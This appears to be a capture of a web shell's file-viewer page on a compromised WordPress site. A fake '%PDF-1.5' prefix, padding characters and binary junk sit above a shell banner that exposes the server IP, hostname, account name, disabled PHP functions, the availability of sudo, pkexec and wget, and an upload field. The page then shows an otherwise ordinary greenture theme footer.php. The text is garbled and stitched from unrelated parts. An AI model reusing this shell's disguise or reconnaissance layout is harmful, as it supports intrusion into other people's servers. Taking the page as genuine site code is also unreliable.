...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/alasaweborg/public_html/wp-content/themes/greenture/ |
Upload File : |
<?php
/**
* The template for displaying the footer.
* @package greenture
*/
?>
</div><!-- #main -->
<div id="footer" class="footer-section">
<div class="footer-inner-wrapper">
<?php $footer_layout_style = greenture_get_option( 'footer_layout_style' );
if( isset( $footer_layout_style ) && $footer_layout_style == 'two-column' ) { ?>
<div id="footer-two-column-container" class="footer-two-column-section">
<?php if( greenture_get_option( 'enable_social_icons_footer' ) ) { ?>
<div id="social-icons" class="footer-social footer-col-social">
<?php echo wp_kses_post(greenture_display_social_icons()); ?>
</div><!-- #social-icons -->
<?php } ?>
<div class="container">
<div class="tpath-row row footer-match-height-column">
<div class="col-md-4 col-sm-6 col-xs-12 footer-match-column footer-left-column">
<?php if( is_active_sidebar( 'footer-left-column' ) ) { ?>
<div id="footer-left-col-widgets" class="footer-left-col-widgets">
<?php dynamic_sidebar( 'footer-left-column' ); ?>
</div>
<?php } ?>
<div class="footer-col-copyright-section">
<div id="copyright-text" class="copyright-info">
<?php if( greenture_get_option( 'copyright_text' ) != '' ) {
echo '<p>'.do_shortcode( esc_html( greenture_get_option( 'copyright_text' ) ) ).'</p>';
} else { ?>
<p><?php esc_html_e('Copyright', 'greenture'); ?> <?php echo date('Y'); ?> <?php esc_html_e('by', 'greenture'); ?> <a href="<?php echo esc_url( home_url() ); ?>"><?php echo bloginfo( 'name' ); ?></a> | <?php esc_html_e('All rights reserved', 'greenture'); ?></p>
<?php } ?>
</div><!-- #copyright-text -->
</div>
</div>
<div class="col-md-8 col-sm-6 col-xs-12 footer-match-column footer-right-column">
<?php }
if( isset( $footer_layout_style ) && $footer_layout_style == 'fullwidth' ) { ?>
<div class="container">
<div class="tpath-row row">
<div class="col-xs-12 footer-top-column">
<?php }
if( is_active_sidebar( 'footer-top-sidebar' ) ) { ?>
<div id="footer-top-widgets" class="footer-top-widgets-section">
<?php dynamic_sidebar( 'footer-top-sidebar' ); ?>
</div>
<?php }
if( isset( $footer_layout_style ) && $footer_layout_style == 'fullwidth' ) { ?>
</div>
</div>
</div>
<?php }
$is_footer_widgets = greenture_get_option( 'footer_widgets_enable' );
if( isset( $is_footer_widgets ) && $is_footer_widgets ) { ?>
<div id="footer-widgets-container" class="footer-widgets-section">
<div class="container">
<div class="tpath-row row">
<?php $columns = greenture_get_option( 'footer_widget_layout' );
if( ! $columns ) $columns = 4;
for( $i = 1; $i <= intval( $columns ); $i++ ) {
if( is_active_sidebar( 'footer-widget-' . $i ) ) { ?>
<div id="footer-widgets-<?php echo esc_attr( $i ); ?>" class="footer-widgets <?php greenture_footer_widget_classes( $columns ); ?>">
<?php dynamic_sidebar( 'footer-widget-' . $i ); ?>
</div>
<?php }
} ?>
</div><!-- .row -->
</div>
</div><!-- #footer-widgets-container -->
<?php }
if( isset( $footer_layout_style ) && $footer_layout_style == 'two-column' ) { ?>
</div>
</div><!-- .row -->
</div>
</div>
<?php } ?>
</div>
<?php if( isset( $footer_layout_style ) && $footer_layout_style == 'fullwidth' ) { ?>
<div id="footer-copyright-container" class="footer-copyright-section">
<div class="container">
<div class="tpath-row">
<div id="copyright-text" class="copyright-info text-center">
<p>© Copyright 2024 - Alasa Web
</div><!-- #copyright-text -->
<?php if( greenture_get_option( 'enable_social_icons_footer' ) ) { ?>
<div id="social-icons" class="footer-social pull-right">
<?php echo wp_kses_post(greenture_display_social_icons()); ?>
</div><!-- #social-icons -->
<?php } ?>
</div>
</div>
</div><!-- #footer-copyright-container -->
<?php } ?>
</div><!-- #footer -->
</div>
<?php wp_footer(); ?>
</body>
</html>